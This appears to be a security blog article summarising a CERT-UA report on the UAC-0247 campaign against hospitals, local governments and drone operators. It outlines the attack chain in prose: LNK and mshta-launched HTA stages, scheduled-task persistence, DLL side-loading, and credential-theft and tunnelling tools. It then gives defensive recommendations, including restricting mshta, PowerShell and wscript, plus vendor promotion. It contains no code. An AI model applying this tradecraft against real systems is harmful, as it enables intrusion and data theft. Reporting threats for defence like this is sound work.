A new wave of highly targeted cyberattacks is putting hospitals, local governments, and even defense-linked operators at risk leveraging deception, advanced malware, and stealthy persistence techniques.
According to insights published by Ukraine’s national cyber response team CERT-UA, the threat cluster tracked as UAC-0247 has intensified operations between March and April 2026, signaling a dangerous evolution in socially engineered cyber warfare.
The campaign begins innocently enough: an email discussing humanitarian aid. But behind the façade lies a carefully orchestrated attack chain designed to infiltrate critical institutions.
Attackers lure victims into clicking malicious links, often backed by AI-generated fake websites or scripts injected into legitimate – but vulnerable – web platforms via Cross-Site Scripting. Once clicked, victims unknowingly download weaponized archives containing shortcut files that trigger multi-stage malware execution.
This isn’t opportunistic cybercrime it’s targeted, persistent, and engineered for deep system compromise.
Inside the Attack Chain: A Technical Breakdown
The infection process reflects a high level of sophistication:
- Initial Payload: Malicious
.LNKfiles trigger execution via native Windows tools likemshta.exe - Stage Execution: Remote HTA files deploy decoy forms while silently installing malware
- Persistence: Scheduled tasks ensure repeated execution and system foothold
- Payload Delivery:
- AGINGFLY – Remote control, keylogging, file exfiltration
- SILENTLOOP – Dynamic C2 communication via Telegram
- RAVENSHELL – Encrypted command execution channel
What makes this campaign particularly dangerous is the modular execution model: attackers dynamically compile malicious code on infected systems, reducing detection by traditional security tools.
Expanding Targets: From Hospitals to FPV Operators
While early attacks focused on healthcare institutions and municipal authorities, newer incidents reveal expansion toward defense-related personnel, including drone (FPV) operators.
In one case, attackers distributed a trojanized version of a tool named “BACHU” via the messaging platform Signal. Using DLL side-loading, the malware silently deployed AGINGFLY—turning trusted software into a cyber weapon.
Post-Exploitation Capabilities
Once inside a network, attackers move quickly:
- Credential theft from browsers using tools like CHROMELEVATOR
- Data extraction from messaging platforms like WhatsApp (via ZAPIXDESK)
- Network reconnaissance using tools such as RUSTSCAN
- Lateral movement and tunneling using LIGOLO-NG and CHISEL
- Even cryptomining activity via XMRIG, disguised within legitimate software like WireGuard
This blend of espionage, persistence, and monetization highlights a hybrid threat model.
Global Implications
Although the campaign is regionally focused, its tactics are globally relevant. The abuse of humanitarian narratives, combined with living-off-the-land techniques and AI-generated deception, signals a broader shift in cyberattack strategies.
Organizations worldwide—especially in healthcare, government, and critical infrastructure—should treat this as a warning.
10 Critical Security Recommendations
To defend against campaigns like UAC-0247, security teams should act immediately:
- Block execution of LNK, HTA, and JS files across endpoints
- Restrict use of native tools like
mshta.exe,powershell.exe, andwscript.exe - Deploy advanced email filtering to detect phishing and spoofed domains
- Implement endpoint detection & response (EDR) solutions
- Monitor abnormal scheduled task creation
- Enforce least privilege access across systems
- Inspect outbound traffic for unusual encrypted connections
- Use threat intelligence feeds to block known indicators (IOCs)
- Regularly patch systems to prevent XSS and web-based exploits
- Conduct continuous employee awareness training via Saintynet Cybersecurity
For deeper protection strategies, explore enterprise-grade solutions at Saintynet Cybersecurity and stay updated with threat intelligence insights on Cybercory.
Expert Insight
This campaign demonstrates how attackers are blending social engineering, legitimate tools, and modular malware to evade detection. The use of Telegram for command-and-control and dynamic payload compilation suggests a move toward resilient, adaptive cyber operations.
Conclusion
The UAC-0247 campaign is a stark reminder that modern cyber threats are no longer just technical they are psychological, strategic, and deeply deceptive. By exploiting trust, especially in humanitarian contexts, attackers are raising the stakes.
Organizations must respond with equal sophistication combining technology, awareness, and proactive defense.
